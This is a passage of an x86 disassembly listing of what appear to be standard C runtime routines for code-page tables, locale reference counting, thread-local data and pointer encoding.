		movzx	edi, byte ptr [esi]
		movzx	eax, al
		jmp	short loc_404F60
; ---------------------------------------------------------------------------

loc_404F4E:				; CODE XREF: sub_404E6E+F4j
		mov	eax, [ebp+var_20]
		mov	al, byte_42349C[eax]
		or	[ebx+edi+1Dh], al
		movzx	eax, byte ptr [esi+1]
		inc	edi

loc_404F60:				; CODE XREF: sub_404E6E+DEj
		cmp	edi, eax
		jbe	short loc_404F4E
		mov	edi, [ebp+arg_0]
		inc	esi
		inc	esi

loc_404F69:				; CODE XREF: sub_404E6E+CFj
					; sub_404E6E+110j
		cmp	byte ptr [esi],	0
		jnz	short loc_404F3F

loc_404F6E:				; CODE XREF: sub_404E6E+D6j
		mov	esi, [ebp+var_1C]
		inc	[ebp+var_20]
		add	esi, 8
		cmp	[ebp+var_20], 4
		mov	[ebp+var_1C], esi
		jb	short loc_404F69
		mov	eax, edi
		mov	[ebx+4], edi
		mov	dword ptr [ebx+8], 1
		call	sub_404B42
		push	6
		mov	[ebx+0Ch], eax
		lea	eax, [ebx+10h]
		lea	ecx, dword_4234A4[ecx]
		pop	edx

loc_404FA0:				; CODE XREF: sub_404E6E+13Dj
		mov	si, [ecx]
		inc	ecx
		mov	[eax], si
		inc	ecx
		inc	eax
		inc	eax
		dec	edx
		jnz	short loc_404FA0

loc_404FAD:				; CODE XREF: sub_404E6E+18Bj
		mov	esi, ebx
		call	sub_404BC6
		jmp	loc_404E9E
; ---------------------------------------------------------------------------

loc_404FB9:				; CODE XREF: sub_404E6E+153j
		or	byte ptr [ebx+eax+1Dh],	4
		inc	eax

loc_404FBF:				; CODE XREF: sub_404E6E+A6j
		cmp	eax, ecx
		jbe	short loc_404FB9
		inc	esi
		inc	esi
		cmp	byte ptr [esi-1], 0
		jnz	loc_404F03

loc_404FCF:				; CODE XREF: sub_404E6E+8Cj
					; sub_404E6E+99j
		lea	eax, [ebx+1Eh]
		mov	ecx, 0FEh

loc_404FD7:				; CODE XREF: sub_404E6E+16Ej
		or	byte ptr [eax],	8
		inc	eax
		dec	ecx
		jnz	short loc_404FD7
		mov	eax, [ebx+4]
		call	sub_404B42
		mov	[ebx+0Ch], eax
		mov	[ebx+8], edx
		jmp	short loc_404FF1
; ---------------------------------------------------------------------------

loc_404FEE:				; CODE XREF: sub_404E6E+82j
		mov	[ebx+8], esi

loc_404FF1:				; CODE XREF: sub_404E6E+17Ej
		xor	eax, eax
		lea	edi, [ebx+10h]
		stosd
		stosd
		stosd
		jmp	short loc_404FAD
; ---------------------------------------------------------------------------

loc_404FFB:				; CODE XREF: sub_404E6E+5Ej
		cmp	dword_427404, esi
		jnz	loc_404E97
		or	eax, 0FFFFFFFFh

loc_40500A:				; CODE XREF: sub_404E6E+32j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_404E6E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405019	proc near		; CODE XREF: sub_4051B3+Bp

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00405185 SIZE 0000002E BYTES

		push	14h
		push	offset dword_421760
		call	__SEH_prolog4
		or	[ebp+var_20], 0FFFFFFFFh
		call	sub_40574D
		mov	edi, eax
		mov	[ebp+var_24], edi
		call	sub_404D50
		mov	ebx, [edi+68h]
		mov	esi, [ebp+arg_0]
		call	sub_404DF4
		mov	[ebp+arg_0], eax
		cmp	eax, [ebx+4]
		jz	loc_4051A6
		push	220h
		call	sub_407AEA
		pop	ecx
		mov	ebx, eax
		test	ebx, ebx
		jz	loc_4051AA
		mov	ecx, 88h
		mov	esi, [edi+68h]
		mov	edi, ebx
		rep movsd
		and	dword ptr [ebx], 0
		push	ebx
		push	[ebp+arg_0]
		call	sub_404E6E
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		test	eax, eax
		jnz	loc_405185
		mov	esi, [ebp+var_24]
		push	dword ptr [esi+68h]
		call	ds:dword_41D18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_4050AA
		mov	eax, [esi+68h]
		cmp	eax, offset dword_423070
		jz	short loc_4050AA
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4050AA:				; CODE XREF: sub_405019+7Ej
					; sub_405019+88j
		mov	[esi+68h], ebx
		push	ebx
		mov	edi, ds:dword_41D1B8
		call	edi	; InterlockedIncrement
		test	byte ptr [esi+70h], 2
		jnz	loc_4051AA
		test	byte ptr dword_423594, 1
		jnz	loc_4051AA
		push	0Dh
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	eax, [ebx+4]
		mov	dword_427414, eax
		mov	eax, [ebx+8]
		mov	dword_427418, eax
		mov	eax, [ebx+0Ch]
		mov	dword_42741C, eax
		xor	eax, eax

loc_4050F3:				; CODE XREF: sub_405019+F0j
		mov	[ebp+var_1C], eax
		cmp	eax, 5
		jge	short loc_40510B
		mov	cx, [ebx+eax*2+10h]
		mov	word_427408[eax*2], cx
		inc	eax
		jmp	short loc_4050F3
; ---------------------------------------------------------------------------

loc_40510B:				; CODE XREF: sub_405019+E0j
		xor	eax, eax

loc_40510D:				; CODE XREF: sub_405019+109j
		mov	[ebp+var_1C], eax
		cmp	eax, 101h
		jge	short loc_405124
		mov	cl, [eax+ebx+1Ch]
		mov	byte_423290[eax], cl
		inc	eax
		jmp	short loc_40510D
; ---------------------------------------------------------------------------

loc_405124:				; CODE XREF: sub_405019+FCj
		xor	eax, eax

loc_405126:				; CODE XREF: sub_405019+125j
		mov	[ebp+var_1C], eax
		cmp	eax, 100h
		jge	short loc_405140
		mov	cl, [eax+ebx+11Dh]
		mov	byte_423398[eax], cl
		inc	eax
		jmp	short loc_405126
; ---------------------------------------------------------------------------

loc_405140:				; CODE XREF: sub_405019+115j
		push	dword_423498
		call	ds:dword_41D18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_405163
		mov	eax, dword_423498
		cmp	eax, offset dword_423070
		jz	short loc_405163
		push	eax
		call	sub_4039C3
		pop	ecx

loc_405163:				; CODE XREF: sub_405019+135j
					; sub_405019+141j
		mov	dword_423498, ebx
		push	ebx
		call	edi	; InterlockedIncrement
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40517A
		jmp	short loc_4051AA
sub_405019	endp


; =============== S U B	R O U T	I N E =======================================



sub_40517A	proc near		; CODE XREF: sub_405019+15Ap
					; DATA XREF: _1fieagrn:00421778o
		push	0Dh
		call	sub_405CCF
		pop	ecx
		retn
sub_40517A	endp

; ---------------------------------------------------------------------------
		jmp	short loc_4051AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_405019

loc_405185:				; CODE XREF: sub_405019+6Aj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4051AA
		cmp	ebx, offset dword_423070
		jz	short loc_405199
		push	ebx
		call	sub_4039C3
		pop	ecx

loc_405199:				; CODE XREF: sub_405019+177j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		jmp	short loc_4051AA
; ---------------------------------------------------------------------------

loc_4051A6:				; CODE XREF: sub_405019+30j
		and	[ebp+var_20], 0

loc_4051AA:				; CODE XREF: sub_405019+45j
					; sub_405019+A1j ...
		mov	eax, [ebp+var_20]
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_405019

; =============== S U B	R O U T	I N E =======================================



sub_4051B3	proc near		; CODE XREF: sub_40AF33+Cp
					; sub_40AF90+Dp ...
		cmp	dword_436434, 0
		jnz	short loc_4051CE
		push	0FFFFFFFDh
		call	sub_405019
		pop	ecx
		mov	dword_436434, 1

loc_4051CE:				; CODE XREF: sub_4051B3+7j
		xor	eax, eax
		retn
sub_4051B3	endp


; =============== S U B	R O U T	I N E =======================================



sub_4051D1	proc near		; CODE XREF: sub_405423+31p
					; sub_405765+E8p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_0]
		mov	eax, [esi+0BCh]
		xor	ebp, ebp
		cmp	eax, ebp
		push	edi
		jz	short loc_405254
		cmp	eax, offset off_423F38
		jz	short loc_405254
		mov	eax, [esi+0B0h]
		cmp	eax, ebp
		jz	short loc_405254
		cmp	[eax], ebp
		jnz	short loc_405254
		mov	eax, [esi+0B8h]
		cmp	eax, ebp
		jz	short loc_40521B
		cmp	[eax], ebp
		jnz	short loc_40521B
		push	eax
		call	sub_4039C3
		push	dword ptr [esi+0BCh]
		call	sub_40CAB4
		pop	ecx
		pop	ecx

loc_40521B:				; CODE XREF: sub_4051D1+31j
					; sub_4051D1+35j
		mov	eax, [esi+0B4h]
		cmp	eax, ebp
		jz	short loc_40523C
		cmp	[eax], ebp
		jnz	short loc_40523C
		push	eax
		call	sub_4039C3
		push	dword ptr [esi+0BCh]
		call	sub_40CA74
		pop	ecx
		pop	ecx

loc_40523C:				; CODE XREF: sub_4051D1+52j
					; sub_4051D1+56j
		push	dword ptr [esi+0B0h]
		call	sub_4039C3
		push	dword ptr [esi+0BCh]
		call	sub_4039C3
		pop	ecx
		pop	ecx

loc_405254:				; CODE XREF: sub_4051D1+12j
					; sub_4051D1+19j ...
		mov	eax, [esi+0C0h]
		cmp	eax, ebp
		jz	short loc_4052A2
		cmp	[eax], ebp
		jnz	short loc_4052A2
		mov	eax, [esi+0C4h]
		sub	eax, 0FEh
		push	eax
		call	sub_4039C3
		mov	eax, [esi+0CCh]
		mov	edi, 80h
		sub	eax, edi
		push	eax
		call	sub_4039C3
		mov	eax, [esi+0D0h]
		sub	eax, edi
		push	eax
		call	sub_4039C3
		push	dword ptr [esi+0C0h]
		call	sub_4039C3
		add	esp, 10h

loc_4052A2:				; CODE XREF: sub_4051D1+8Bj
					; sub_4051D1+8Fj
		lea	edi, [esi+0D4h]
		mov	eax, [edi]
		cmp	eax, offset off_423E78
		jz	short loc_4052C8
		cmp	[eax+0B4h], ebp
		jnz	short loc_4052C8
		push	eax
		call	sub_40C8E4
		push	dword ptr [edi]
		call	sub_4039C3
		pop	ecx
		pop	ecx

loc_4052C8:				; CODE XREF: sub_4051D1+DEj
					; sub_4051D1+E6j
		push	6
		lea	edi, [esi+50h]
		pop	ebx

loc_4052CE:				; CODE XREF: sub_4051D1+132j
		cmp	dword ptr [edi-8], offset dword_423598
		jz	short loc_4052E8
		mov	eax, [edi]
		cmp	eax, ebp
		jz	short loc_4052E8
		cmp	[eax], ebp
		jnz	short loc_4052E8
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4052E8:				; CODE XREF: sub_4051D1+104j
					; sub_4051D1+10Aj ...
		cmp	[edi-4], ebp
		jz	short loc_4052FF
		mov	eax, [edi+4]
		cmp	eax, ebp
		jz	short loc_4052FF
		cmp	[eax], ebp
		jnz	short loc_4052FF
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4052FF:				; CODE XREF: sub_4051D1+11Aj
					; sub_4051D1+121j ...
		add	edi, 10h
		dec	ebx
		jnz	short loc_4052CE
		push	esi
		call	sub_4039C3
		pop	ecx
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_4051D1	endp


; =============== S U B	R O U T	I N E =======================================



sub_405311	proc near		; CODE XREF: sub_405423+12p
					; sub_405616+93p

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_0]
		push	edi
		mov	edi, ds:dword_41D1B8
		push	esi
		call	edi	; InterlockedIncrement
		mov	eax, [esi+0B0h]
		test	eax, eax
		jz	short loc_40532F
		push	eax
		call	edi	; InterlockedIncrement

loc_40532F:				; CODE XREF: sub_405311+19j
		mov	eax, [esi+0B8h]
		test	eax, eax
		jz	short loc_40533C
		push	eax
		call	edi	; InterlockedIncrement

loc_40533C:				; CODE XREF: sub_405311+26j
		mov	eax, [esi+0B4h]
		test	eax, eax
		jz	short loc_405349
		push	eax
		call	edi	; InterlockedIncrement

loc_405349:				; CODE XREF: sub_405311+33j
		mov	eax, [esi+0C0h]
		test	eax, eax
		jz	short loc_405356
		push	eax
		call	edi	; InterlockedIncrement

loc_405356:				; CODE XREF: sub_405311+40j
		push	6
		lea	ebx, [esi+50h]
		pop	ebp

loc_40535C:				; CODE XREF: sub_405311+71j
		cmp	dword ptr [ebx-8], offset dword_423598
		jz	short loc_40536E
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_40536E
		push	eax
		call	edi	; InterlockedIncrement

loc_40536E:				; CODE XREF: sub_405311+52j
					; sub_405311+58j
		cmp	dword ptr [ebx-4], 0
		jz	short loc_40537E
		mov	eax, [ebx+4]
		test	eax, eax
		jz	short loc_40537E
		push	eax
		call	edi	; InterlockedIncrement

loc_40537E:				; CODE XREF: sub_405311+61j
					; sub_405311+68j
		add	ebx, 10h
		dec	ebp
		jnz	short loc_40535C
		mov	eax, [esi+0D4h]
		add	eax, 0B4h
		push	eax
		call	edi	; InterlockedIncrement
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_405311	endp


; =============== S U B	R O U T	I N E =======================================



sub_405397	proc near		; CODE XREF: sub_405423+1Dp
					; sub_405765+CCp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40541F
		push	ebx
		push	ebp
		push	edi
		mov	edi, ds:dword_41D18C
		push	esi
		call	edi	; InterlockedDecrement
		mov	eax, [esi+0B0h]
		test	eax, eax
		jz	short loc_4053B9
		push	eax
		call	edi	; InterlockedDecrement

loc_4053B9:				; CODE XREF: sub_405397+1Dj
		mov	eax, [esi+0B8h]
		test	eax, eax
		jz	short loc_4053C6
		push	eax
		call	edi	; InterlockedDecrement

loc_4053C6:				; CODE XREF: sub_405397+2Aj
		mov	eax, [esi+0B4h]
		test	eax, eax
		jz	short loc_4053D3
		push	eax
		call	edi	; InterlockedDecrement

loc_4053D3:				; CODE XREF: sub_405397+37j
		mov	eax, [esi+0C0h]
		test	eax, eax
		jz	short loc_4053E0
		push	eax
		call	edi	; InterlockedDecrement

loc_4053E0:				; CODE XREF: sub_405397+44j
		push	6
		lea	ebx, [esi+50h]
		pop	ebp

loc_4053E6:				; CODE XREF: sub_405397+75j
		cmp	dword ptr [ebx-8], offset dword_423598
		jz	short loc_4053F8
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_4053F8
		push	eax
		call	edi	; InterlockedDecrement

loc_4053F8:				; CODE XREF: sub_405397+56j
					; sub_405397+5Cj
		cmp	dword ptr [ebx-4], 0
		jz	short loc_405408
		mov	eax, [ebx+4]
		test	eax, eax
		jz	short loc_405408
		push	eax
		call	edi	; InterlockedDecrement

loc_405408:				; CODE XREF: sub_405397+65j
					; sub_405397+6Cj
		add	ebx, 10h
		dec	ebp
		jnz	short loc_4053E6
		mov	eax, [esi+0D4h]
		add	eax, 0B4h
		push	eax
		call	edi	; InterlockedDecrement
		pop	edi
		pop	ebp
		pop	ebx

loc_40541F:				; CODE XREF: sub_405397+7j
		mov	eax, esi
		pop	esi
		retn
sub_405397	endp


; =============== S U B	R O U T	I N E =======================================



sub_405423	proc near		; CODE XREF: sub_405461+54p
		test	edi, edi
		jz	short loc_40545E
		test	eax, eax
		jz	short loc_40545E
		push	esi
		mov	esi, [eax]
		cmp	esi, edi
		jz	short loc_40545A
		push	edi
		mov	[eax], edi
		call	sub_405311
		test	esi, esi
		pop	ecx
		jz	short loc_40545A
		push	esi
		call	sub_405397
		cmp	dword ptr [esi], 0
		pop	ecx
		jnz	short loc_40545A
		cmp	esi, offset dword_4235A0
		jz	short loc_40545A
		push	esi
		call	sub_4051D1
		pop	ecx

loc_40545A:				; CODE XREF: sub_405423+Dj
					; sub_405423+1Aj ...
		mov	eax, edi
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40545E:				; CODE XREF: sub_405423+2j
					; sub_405423+6j
		xor	eax, eax
		retn
sub_405423	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405461	proc near		; CODE XREF: sub_402ADF+37p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_421780
		call	__SEH_prolog4
		call	sub_40574D
		mov	esi, eax
		mov	eax, dword_423594
		test	[esi+70h], eax
		jz	short loc_4054A0
		cmp	dword ptr [esi+6Ch], 0
		jz	short loc_4054A0
		call	sub_40574D
		mov	esi, [eax+6Ch]

loc_40548C:				; CODE XREF: sub_405461+68j
		test	esi, esi
		jnz	short loc_405498
		push	20h
		call	sub_407C0D
		pop	ecx

loc_405498:				; CODE XREF: sub_405461+2Dj
		mov	eax, esi
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4054A0:				; CODE XREF: sub_405461+1Bj
					; sub_405461+21j
		push	0Ch
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		lea	eax, [esi+6Ch]
		mov	edi, off_423678
		call	sub_405423
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4054CB
		jmp	short loc_40548C
sub_405461	endp


; =============== S U B	R O U T	I N E =======================================



sub_4054CB	proc near		; CODE XREF: sub_405461+63p
		push	0Ch
		call	sub_405CCF
		pop	ecx
		mov	esi, [ebp-1Ch]
		retn
sub_4054CB	endp


; =============== S U B	R O U T	I N E =======================================



sub_4054D7	proc near		; CODE XREF: sub_4030C9+81p
					; sub_4030C9+96p ...

arg_0		= dword	ptr  4

		push	esi
		push	dword_42368C
		mov	esi, ds:dword_41D180
		call	esi	; TlsGetValue
		test	eax, eax
		jz	short loc_40550B
		mov	eax, dword_423688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40550B
		push	eax
		push	dword_42368C
		call	esi	; TlsGetValue
		call	eax
		test	eax, eax
		jz	short loc_40550B
		mov	eax, [eax+1F8h]
		jmp	short loc_405526
; ---------------------------------------------------------------------------

loc_40550B:				; CODE XREF: sub_4054D7+11j
					; sub_4054D7+1Bj ...
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41D0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_405534
		push	offset aEncodepointer ;	"EncodePointer"
		push	eax
		call	ds:off_41D0E8

loc_405526:				; CODE XREF: sub_4054D7+32j
		test	eax, eax
		jz	short loc_405534
		push	[esp+4+arg_0]
		call	eax
		mov	[esp+4+arg_0], eax

loc_405534:				; CODE XREF: sub_4054D7+41j
					; sub_4054D7+51j
		mov	eax, [esp+4+arg_0]
		pop	esi
		retn
sub_4054D7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40553A	proc near		; CODE XREF: sub_407EC9+1p
					; sub_40BCC4+2Fp ...
		push	0
		call	sub_4054D7
		pop	ecx
		retn
sub_40553A	endp


; =============== S U B	R O U T	I N E =======================================



sub_405543	proc near		; CODE XREF: sub_4030C9+Bp
					; sub_4030C9+1Cp ...

arg_0		= dword	ptr  4

		push	esi
		push	dword_42368C
		mov	esi, ds:dword_41D180
		call	esi	; TlsGetValue
		test	eax, eax
		jz	short loc_405577
		mov	eax, dword_423688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405577
		push	eax
		push	dword_42368C
		call	esi	; TlsGetValue
		call	eax
		test	eax, eax
		jz	short loc_405577
		mov	eax, [eax+1FCh]
		jmp	short loc_405592
; ---------------------------------------------------------------------------

loc_405577:				; CODE XREF: sub_405543+11j
					; sub_405543+1Bj ...
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41D0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_4055A0
		push	offset aDecodepointer ;	"DecodePointer"
		push	eax
		call	ds:off_41D0E8

loc_405592:				; CODE XREF: sub_405543+32j
		test	eax, eax
		jz	short loc_4055A0
		push	[esp+4+arg_0]
		call	eax
		mov	[esp+4+arg_0], eax

loc_4055A0:				; CODE XREF: sub_405543+41j
					; sub_405543+51j
		mov	eax, [esp+4+arg_0]
		pop	esi
		retn
sub_405543	endp


; =============== S U B	R O U T	I N E =======================================



sub_4055A6	proc near		; DATA XREF: sub_405886+8Ao
					; .data:off_427444o
		call	ds:dword_41D17C	; TlsAlloc
		retn	4
sub_4055A6	endp


; =============== S U B	R O U T	I N E =======================================



sub_4055AF	proc near		; CODE XREF: sub_4056CA+Ap
		push	dword_42368C
		call	ds:dword_41D180	; TlsGetValue
		test	eax, eax
		jnz	short locret_4055D8
		push	off_427448
		call	sub_405543
		pop	ecx
		push	eax
		push	dword_42368C
		call	ds:dword_41D178	; TlsSetValue

locret_4055D8:				; CODE XREF: sub_4055AF+Ej
		retn
sub_4055AF	endp


; =============== S U B	R O U T	I N E =======================================



sub_4055D9	proc near		; CODE XREF: sub_405886+12p
					; sub_405886:loc_405A00p
		mov	eax, dword_423688
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4055F9
		push	eax
		push	off_427450
		call	sub_405543
		pop	ecx
		call	eax
		or	dword_423688, 0FFFFFFFFh

loc_4055F9:				; CODE XREF: sub_4055D9+8j
		mov	eax, dword_42368C
		cmp	eax, 0FFFFFFFFh
		jz	short loc_405611
		push	eax
		call	ds:off_41D174
		or	dword_42368C, 0FFFFFFFFh

loc_405611:				; CODE XREF: sub_4055D9+28j
		jmp	sub_405C7A
sub_4055D9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405616	proc near		; CODE XREF: sub_4056CA+59p
					; sub_405886+162p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	0Ch
		push	offset dword_4217A0
		call	__SEH_prolog4
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41D0E0	; GetModuleHandleA
		mov	[ebp+var_1C], eax
		mov	esi, [ebp+arg_0]
		mov	dword ptr [esi+5Ch], offset dword_423DC0
		xor	edi, edi
		inc	edi
		mov	[esi+14h], edi
		test	eax, eax
		jz	short loc_405668
		push	offset aEncodepointer ;	"EncodePointer"
		push	eax
		mov	ebx, ds:off_41D0E8
		call	ebx ; sub_45AAC8
		mov	[esi+1F8h], eax
		push	offset aDecodepointer ;	"DecodePointer"
		push	[ebp+var_1C]
		call	ebx ; sub_45AAC8
		mov	[esi+1FCh], eax

loc_405668:				; CODE XREF: sub_405616+2Cj
		mov	[esi+70h], edi
		mov	byte ptr [esi+0C8h], 43h
		mov	byte ptr [esi+14Bh], 43h
		mov	eax, offset dword_423070
		mov	[esi+68h], eax
		push	eax
		call	ds:dword_41D1B8	; InterlockedIncrement
		push	0Ch
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	eax, [ebp+arg_4]
		mov	[esi+6Ch], eax
		test	eax, eax
		jnz	short loc_4056A6
		mov	eax, off_423678
		mov	[esi+6Ch], eax

loc_4056A6:				; CODE XREF: sub_405616+86j
		push	dword ptr [esi+6Ch]
		call	sub_405311
		pop	ecx
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4056C1
		call	__SEH_epilog4
		retn
sub_405616	endp


; =============== S U B	R O U T	I N E =======================================



sub_4056C1	proc near		; CODE XREF: sub_405616+A0p
					; DATA XREF: _1fieagrn:004217B8o
		push	0Ch
		call	sub_405CCF
		pop	ecx
		retn
sub_4056C1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4056CA	proc near		; CODE XREF: sub_40574D+1p sub_405B83p ...
		push	esi
		push	edi
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		mov	edi, eax
		call	sub_4055AF
		push	dword_423688
		push	dword_42368C
		call	ds:dword_41D180	; TlsGetValue
		call	eax
		mov	esi, eax
		test	esi, esi
		jnz	short loc_405741
		push	214h
		push	1
		call	sub_407B2A
		mov	esi, eax
		test	esi, esi
		pop	ecx
		pop	ecx
		jz	short loc_405741
		push	esi
		push	dword_423688
		push	off_42744C
		call	sub_405543
		pop	ecx
		call	eax
		test	eax, eax
		jz	short loc_405738
		push	0
		push	esi
		call	sub_405616
		pop	ecx
		pop	ecx
		call	ds:dword_41D0DC	; GetCurrentThreadId
		or	dword ptr [esi+4], 0FFFFFFFFh
		mov	[esi], eax
		jmp	short loc_405741
; ---------------------------------------------------------------------------

loc_405738:				; CODE XREF: sub_4056CA+54j
		push	esi
		call	sub_4039C3
		pop	ecx
		xor	esi, esi

loc_405741:				; CODE XREF: sub_4056CA+27j
					; sub_4056CA+3Bj ...
		push	edi
		call	ds:dword_41D170	; RtlRestoreLastWin32Error
		pop	edi
		mov	eax, esi
		pop	esi
		retn
sub_4056CA	endp


; =============== S U B	R O U T	I N E =======================================



sub_40574D	proc near		; CODE XREF: sub_402ADF+Fp sub_403716p ...
		push	esi
		call	sub_4056CA
		mov	esi, eax
		test	esi, esi
		jnz	short loc_405761
		push	10h
		call	sub_407C0D
		pop	ecx

loc_405761:				; CODE XREF: sub_40574D+Aj
		mov	eax, esi
		pop	esi
		retn
sub_40574D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405765	proc near		; DATA XREF: sub_405886+115o

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_4217C0
		call	__SEH_prolog4
		mov	esi, [ebp+arg_0]
		test	esi, esi
		jz	loc_405866
		mov	eax, [esi+24h]
		test	eax, eax
		jz	short loc_40578A
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40578A:				; CODE XREF: sub_405765+1Cj
		mov	eax, [esi+2Ch]
		test	eax, eax
		jz	short loc_405798
		push	eax
		call	sub_4039C3
		pop	ecx

loc_405798:				; CODE XREF: sub_405765+2Aj
		mov	eax, [esi+34h]
		test	eax, eax
		jz	short loc_4057A6
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4057A6:				; CODE XREF: sub_405765+38j
		mov	eax, [esi+3Ch]
		test	eax, eax
		jz	short loc_4057B4
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4057B4:				; CODE XREF: sub_405765+46j
		mov	eax, [esi+44h]
		test	eax, eax
		jz	short loc_4057C2
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4057C2:				; CODE XREF: sub_405765+54j
		mov	eax, [esi+48h]
		test	eax, eax
		jz	short loc_4057D0
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4057D0:				; CODE XREF: sub_405765+62j
		mov	eax, [esi+5Ch]
		cmp	eax, offset dword_423DC0
		jz	short loc_4057E1
		push	eax
		call	sub_4039C3
		pop	ecx

loc_4057E1:				; CODE XREF: sub_405765+73j
		push	0Dh
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	edi, [esi+68h]
		test	edi, edi
		jz	short loc_40580E
		push	edi
		call	ds:dword_41D18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_40580E
		cmp	edi, offset dword_423070
		jz	short loc_40580E
		push	edi
		call	sub_4039C3
		pop	ecx

loc_40580E:				; CODE XREF: sub_405765+8Dj
					; sub_405765+98j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405871
		push	0Ch
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], 1
		mov	edi, [esi+6Ch]
		test	edi, edi
		jz	short loc_405853
		push	edi
		call	sub_405397
		pop	ecx
		cmp	edi, off_423678
		jz	short loc_405853
		cmp	edi, offset dword_4235A0
		jz	short loc_405853
		cmp	dword ptr [edi], 0
		jnz	short loc_405853
		push	edi
		call	sub_4051D1
		pop	ecx

loc_405853:				; CODE XREF: sub_405765+C9j
					; sub_405765+D8j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40587D
		push	esi
		call	sub_4039C3
		pop	ecx

loc_405866:				; CODE XREF: sub_405765+11j
		call	__SEH_epilog4
		retn	4
sub_405765	endp


; =============== S U B	R O U T	I N E =======================================



sub_40586E	proc near		; DATA XREF: _1fieagrn:004217D8o
		mov	esi, [ebp+8]
sub_40586E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_405871	proc near		; CODE XREF: sub_405765+B0p
		push	0Dh
		call	sub_405CCF
		pop	ecx
		retn
sub_405871	endp


; =============== S U B	R O U T	I N E =======================================



sub_40587A	proc near		; DATA XREF: _1fieagrn:004217E4o
		mov	esi, [ebp+8]
sub_40587A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40587D	proc near		; CODE XREF: sub_405765+F5p
		push	0Ch
		call	sub_405CCF
		pop	ecx
		retn
sub_40587D	endp


; =============== S U B	R O U T	I N E =======================================



sub_405886	proc near		; CODE XREF: sub_4044D2:loc_4043D5p
		push	edi
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41D0E0	; GetModuleHandleA
		mov	edi, eax
		test	edi, edi
		jnz	short loc_4058A1
		call	sub_4055D9
		xor	eax, eax
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_4058A1:				; CODE XREF: sub_405886+10j
		push	esi
		mov	esi, ds:off_41D0E8
		push	offset dword_41D4E4
		push	edi
		call	esi ; sub_45AAC8
		push	offset aFlsgetvalue ; "FlsGetValue"
		push	edi
		mov	off_427444, eax
		call	esi ; sub_45AAC8
		push	offset aFlssetvalue ; "FlsSetValue"
		push	edi
		mov	off_427448, eax
		call	esi ; sub_45AAC8
		push	offset aFlsfree	; "FlsFree"
		push	edi
		mov	off_42744C, eax
		call	esi ; sub_45AAC8
		cmp	off_427444, 0
		mov	esi, ds:dword_41D178
		mov	off_427450, eax
		jz	short loc_405901
		cmp	off_427448, 0
		jz	short loc_405901
		cmp	off_42744C, 0
